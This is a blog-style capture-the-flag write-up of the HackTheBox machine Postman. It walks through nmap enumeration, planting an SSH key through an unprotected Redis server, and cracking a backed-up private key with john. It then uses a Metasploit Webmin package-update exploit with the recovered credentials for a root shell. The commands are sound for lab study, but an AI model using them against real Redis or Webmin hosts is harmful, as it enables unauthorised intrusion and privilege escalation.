Samuel Jones

Samuel Jones

Cyber Security Consultant

Htb Postman Writeup

3 minute read

HackTheBox Postman Writeup

Overview

This is a write up of the HackTheBox machine Postman. OS : Linux, IP : 10.10.10.160, Difficulty : Easy.

Information Gathering

Nmap

I started my enumeration with an nmap scan as seen below which revealed to me some open ports which I could investigate further.

  nmap -sC -sV 10.10.10.160
  Nmap scan report for 10.10.10.160
  Host is up (0.15s latency).
  Not shown: 997 closed ports
  PORT      STATE SERVICE VERSION
  22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
  |   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
  |_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
  80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: The Cyber Geek's Personal Website
  6379/tcp open  redis   Redis key-value store 4.0.9
  10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
  |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

This scan has revealed that port 22, 80, 6379 and 10000 are open.

Website Discovery

When we go to the website running on port 80 we are taken to this page.

Basic discovery of the website doesn’t reveal anything useful, so we move on with enumeration.

Redis

As we can see from the nmap scan redis is running on version 4.0.9 which has many public vulnerabilities. We can use the redis-cli client to communicate with this server and if unprotected may allow us to access it.

  redis-cli -h 10.10.10.160
  10.10.10.160:6379> config get dir
  1) "dir"
  2) "/var/lib/redis"

Webmin httpd

The version of redis used on this machine has 2 major vulnerabilities which both have metasploit modules. Testing both of these however revealed that we were not able to use them.

Getting User

As we saw in the enumeration stage of redis we see that we are in the home directory of the user that runs the redis server. We can see that this is true by moving into the .ssh directory.

  10.10.10.160:6379> config set dir ./.ssh
  OK
  10.10.10.160:6379> config get dir
  1) "dir"
  2) "/var/lib/redis/.ssh"

As we have access to this we can attempt to add our own ssh key into the authorized_keys file. Generate a key with the ssh-keygen command and enter through all the prompts. Add 2 new lines both above and below the public key file to ensure that it can be interpreted by SSH daemon.

  (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > publickey.txt

We are now going to use the -x option in redis-cli which is going to read the last STDIN argument so that we can cat the file into redis-cli and set its value. In this case the STDIN argument is going to be the public key we just generated and added new lines to.

  cat publickey.txt | redis-cli -h 10.10.10.160 -x set crack
  OK

We now need to tell redis that the dbname is authorized_keys and then proceed to save it.

  10.10.10.160:6379> config set dir /var/lib/redis/.ssh
  OK
  10.10.10.160:6379> config set dbfilename "authorized_keys"
  OK
  10.10.10.160:6379> save
  OK

We can now log in through SSH.

  ssh -i id_rsa redis@10.10.10.160

Getting The Second User

Once inside as the user redis we can begin local enumeration. the history command reveals that another user names Matt accessed a file named id_rsa.bak. Assuming that this is a backup of the private key we can search for it using the find command.

  find / -name "id_rsa.bak" -ls 2>/dev/null

We can see that it is located in the /opt/ directory.

When we look into the id_rsa.bak file we can see that it is encrypted, so we need to first retrieve it to be able to crack it. We can retrieve it with scp and once its on our local system we can crack it using ssh2john.

  ./ssh2john.py matt_key > matt

Then cracking it using john reveals the password computer2008.

  john matt --wordlist=rockyou.txt
  computer2008

Finally, we can access this user by going back to the redis user and typing

  su Matt

You can now access the user flag with.

  cat user.txt

Getting Root

Accessing the webmin portal on port 10000 we can reuse the credentials that we have already found to access it. Through enumeration of this webmin portal we can see that many security packages are also disabled.

Through a google search we can see that there is a exploit that requires user credentials that is authorized to the Package Updates module.

A metasploit exploit already exists that exploits this so opening msfconsole we can type

  use exploit/linux/http/webmin_packageup_rce

Configure the exploit with the following commands

  set rhosts 10.10.10.160
  set username Matt
  set PASSWORD computer2008
  set lhost <local ip>
  set ssl true

We are given back a root shell where we can now access the root.txt flag.

Updated: